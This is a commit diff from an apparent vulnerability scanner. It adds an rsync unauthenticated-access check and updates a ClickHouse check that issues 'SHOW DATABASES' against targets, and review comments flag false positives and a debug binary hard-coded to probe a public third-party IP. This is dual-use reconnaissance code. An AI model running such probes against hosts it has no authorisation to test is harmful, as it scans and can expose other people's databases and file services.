  • add rsync unauth & update clickhouse unauth

  • zan8in committed 2 years ago
    dd14d918
    1 parent 21bd6fe1
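--- a/afrog-pocs/vulnerability/clickhouse-api-sql-unauth.yaml
+++ b/afrog-pocs/vulnerability/clickhouse-api-unauth.yaml
@@ -1,4 +1,4 @@
-id: clickhouse-api-sql-unauth
+id: clickhouse-api-unauth
 
 info:
 name: ClickHouse API 数据库接口未授权访问漏洞 8123端口
@@ -8,6 +8,7 @@
 ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据
 ClickHouse 8123端口
 "ClickHouse" && body="ok"
+protocol="ClickHouse" && port="8123"
 reference:
 - http://wiki.peiqi.tech/wiki/serverapp/ClickHouse/ClickHouse%20API%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8E%A5%E5%8F%A3%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html
 - http://wiki.peiqi.tech/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.html
@@ -16,7 +17,12 @@
 r0:
 request:
 method: GET
+path: /
+expression: response.status == 200 && response.body.bcontains(b'Ok.') && response.raw_header.bcontains(b'X-ClickHouse-Summary:')
+r1:
+request:
+method: GET
 path: /?query=SHOW%20DATABASES
 expression: response.status == 200 && response.body.bcontains(b'db_ananas') && response.body.bcontains(b'db_portrait') && response.body.bcontains(b'default') && response.body.bcontains(b'system')
-expression: r0()
+expression: r0() || r1()
 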
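Review bot: The new top-level `expression: r0() || r1()` reports the target as vulnerable whenever r0 alone matches, yet r0 only fetches `/` and looks for `Ok.` plus an `X-ClickHouse-Summary:` header, which — as far as I know — a ClickHouse HTTP endpoint answers before any credentials are checked, so a password-protected instance that is merely reachable would be flagged, while only r1 (`/?query=SHOW%20DATABASES` returning database names) demonstrates that SQL runs without authentication. Keep r0 as the fingerprint and require r1 for the verdict, e.g. `expression: r0() && r1()`, or leave r0 out of the final expression. r1 also keys on the instance-specific names `db_ananas` and `db_portrait`, so the result depends on one particular host's schema rather than on the `default`/`system` databases every install has; a comment next to that expression should say why those names were chosen. Renaming the id from `clickhouse-api-sql-unauth` to `clickhouse-api-unauth` is a breaking change for anything that referenced the old id.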
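--- a/cmd/socket/main.go
+++ b/cmd/socket/main.go
@@ -71,7 +71,15 @@
 }
 
 func main() {
-multiTestHttp()
+// multiTestHttp()
+// testDialHost("47.254.87.212:873")
+
+r, err := utils.Tcp("47.254.87.212:873", []byte("info\r\n"))
+if err != nil {
+fmt.Println(err.Error())
+return
+}
+fmt.Println(string(r))
 
 // r, err := utils.Tcp("58.152.168.153:3306", []byte("GET /r.html HTTP/1.0\r\n\r\n"))
 // fmt.Println(string(r), err)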
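Review bot: The probe target `47.254.87.212:873` is hard-coded into `main` (new lines 75–77) and is a public address rather than a local test fixture, so every run of this debug binary sends an unsolicited connection to a third-party host and the address is now part of the repository history. Take it from a flag instead, e.g. `target := flag.String("addr", "127.0.0.1:873", "host:port to probe")`, `flag.Parse()`, `r, err := utils.Tcp(*target, []byte("info\r\n"))` (this needs `flag` in the import block, which lies outside the hunk). `fmt.Println(string(r))` also echoes the raw remote reply to the terminal unfiltered; `fmt.Printf("%q\n", r)` keeps control bytes visible. `main` continues past the end of the hunk.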
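--- /dev/null
+++ b/pkg/gopoc/rsync.go
@@ -0,0 +1,75 @@
+package gopoc
+
+import (
+"bytes"
+"errors"
+
+"github.com/zan8in/afrog/pkg/poc"
+"github.com/zan8in/afrog/pkg/proto"
+"github.com/zan8in/afrog/pkg/utils"
+)
+
+var (
+rsyncPort = "873"
+rsyncUnAuthName = "rsync-unauth"
+)
+
+func rsyncUnAuth(args *GoPocArgs) (Result, error) {
+poc := poc.Poc{
+Id: rsyncUnAuthName,
+Info: poc.Info{
+Name: "Rsync 未授权访问",
+Author: "zan8in",
+Severity: "critical",
+Description: "Rsync为Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。rsync默认配置文件为/etc/rsyncd.conf,常驻模式启动命令rsync –daemon,启动成功后默认监听于TCP端口873,可通过rsync-daemon及ssh两种方式进行认证",
+Reference: []string{
+"http://wiki.peiqi.tech/redteam/vulnerability/unauthorized/Rsync%20873%E7%AB%AF%E5%8F%A3.html",
+},
+},
+}
+args.SetPocInfo(poc)
+result := Result{Gpa: args, IsVul: false}
+
+if len(args.Host) == 0 {
+return result, errors.New("no host")
+}
+
+if len(args.Port) > 0 && args.Port != "80" && args.Port != "443" {
+addr := args.Host + ":" + args.Port
+payload := []byte("info\r\n")
+
+resp, err := utils.Tcp(addr, payload)
+if err != nil {
+return result, err
+}
+
+if bytes.Contains(resp, []byte("@RSYNCD")) {
+result.IsVul = true
+url := proto.UrlType{Host: addr, Port: args.Port}
+result.SetAllPocResult(true, &url, payload, resp)
+return result, nil
+}
+}
+
+addr := args.Host + ":" + rsyncPort
+payload := []byte("info\r\n")
+
+resp, err := utils.Tcp(addr, payload)
+if err != nil {
+return result, err
+}
+
+if bytes.Contains(resp, []byte("@RSYNCD")) {
+result.IsVul = true
+url := proto.UrlType{Host: addr, Port: rsyncPort}
+result.SetAllPocResult(true, &url, payload, resp)
+return result, nil
+}
+
+return result, errors.New("check result: no vul")
+}
+
+func init() {
+GoPocRegister(rsyncUnAuthName, rsyncUnAuth)
+}
+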
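Review bot: `bytes.Contains(resp, []byte("@RSYNCD"))` (lines 46 and 62) is the only evidence used to set `result.IsVul`, but an rsync daemon sends its `@RSYNCD: <version>` greeting to every client before any module or credential exchange, so this matches daemons configured with `auth users` just as readily as open ones — the check shows an rsync daemon is listening, not that access is unauthenticated, and `Severity: "critical"` is attached to that weaker fact. The same probe-and-match sequence is also written out twice (lines 37–52 for the caller-supplied port, 54–67 for the 873 fallback), so any stricter verdict would have to be fixed in both places; folding it into one helper as below removes that hazard, and note that a transport error on the custom port (line 43) returns before the 873 fallback is ever tried, which may or may not be intended. Smaller points: `poc := poc.Poc{` on line 18 shadows the `poc` package for the rest of the function (rename the local, e.g. `p := poc.Poc{`), and `rsyncPort`/`rsyncUnAuthName` are never reassigned, so `const` fits better than `var`. The helper below keeps the banner match unchanged and only marks it, since the exact follow-up exchange `utils.Tcp` would need is not visible here.
```go
// probeRsync sends the probe to addr and records a finding when the reply
// carries the rsync banner. Returns true when a finding was recorded.
// NOTE(review): the banner is sent by every rsync daemon; a stricter verdict
// would also have to inspect the daemon's answer to a module request.
func probeRsync(result *Result, addr, port string) (bool, error) {
	payload := []byte("info\r\n")
	resp, err := utils.Tcp(addr, payload)
	if err != nil {
		return false, err
	}
	if !bytes.Contains(resp, []byte("@RSYNCD")) {
		return false, nil
	}
	result.IsVul = true
	url := proto.UrlType{Host: addr, Port: port}
	result.SetAllPocResult(true, &url, payload, resp)
	return true, nil
}

func rsyncUnAuth(args *GoPocArgs) (Result, error) {
	// … unchanged: poc metadata, SetPocInfo, result and the empty-host check …
	if len(args.Port) > 0 && args.Port != "80" && args.Port != "443" {
		if hit, err := probeRsync(&result, args.Host+":"+args.Port, args.Port); err != nil || hit {
			return result, err
		}
	}
	if hit, err := probeRsync(&result, args.Host+":"+rsyncPort, rsyncPort); err != nil || hit {
		return result, err
	}
	return result, errors.New("check result: no vul")
}
```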